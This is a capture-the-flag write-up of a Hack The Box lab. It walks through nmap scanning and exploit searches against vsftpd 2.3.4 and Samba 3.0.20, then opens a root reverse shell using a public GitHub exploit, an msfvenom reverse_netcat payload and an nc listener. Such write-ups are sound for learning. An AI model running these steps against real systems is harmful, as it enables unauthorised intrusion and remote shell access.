- Run two nmap scans to determine the open ports, services and OS.
- Based on the discovered information, search for possible exploits.
- Look for exploits scripts for each service versions for gaining root.
- Test the exploits to see if the discovered services are exploitable.
- -O <Enable OS detection
- -sC <Run default scripts>
- -sV <Probe open ports to determine service/version info>
- -oA <Output to all format>
- -p- <Scan all ports>
sudo nmap -sC -sV -O -oA quickscan 10.10.10.3
sudo nmap -p- -sC -sV -O -oA fullscan 10.10.10.3
We discovered five attack surfaces from our port scanning results. They are:
- ftp (port:21, version: vsftpd 2.3.4)
- ssh (port:22, version:OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0))
- netbios-ssn (port:139, version:Samba smbd 3.X – 4.X (workgroup: WORKGROUP))
- netbios-ssn (port:445, version:Samba smbd 3.0.20-Debian (workgroup: WORKGROUP))
- distccd (port:3632, version: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
One convenient way of checking if the service version has an exploit is to use the
searchsploit tool in Kali Linux. Here we can see that this particular FTP version has a reported exploit.
We can try googling for a python exploit. I found this in github:
However, when I executed the script, the exploit was not successful. The script was stuck and did not progress further.
There were a few user enumeration attack on SSH. This usually takes time and we can come back if the other services are not exploitable.
This particular version of Samba has exploit available.
I found an exploit script in Python: https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py
You will need to update the script by following the steps below:
- Get your LHOST:
ip addr|grep tun0
- Generate the reverse netcat buffer payload:
msfvenom -p cmd/unix/reverse_netcat LHOST=<Your LHOST> LPORT=<Specify any port> -f python
- Replace line 8 to 15 with the generated payload from
- Update victim IP to the box IP address.
- Remove line 1.
- Install pysmb:
pip install pysmb
- Start netcat:
nc -nlvp 1337
- Run the exploit:
Now can run command now to get the FLAG in as the root user.
Reflections on the lab
This was the first lab that I have completed in Hack The Box (HTB). I learned a few things here:
- This is abit different from purely web application hacking that I am more familiar with. You need to perform recon and systematically enumerate the services.
- You need to know how to look for exploits, modifying and debugging the scripts that you found online.
- You need to know some tools such as msfvenom, netcat and python etc.
- Also port scanning needs to be thorough in order to discover more services that the quick scan does not find.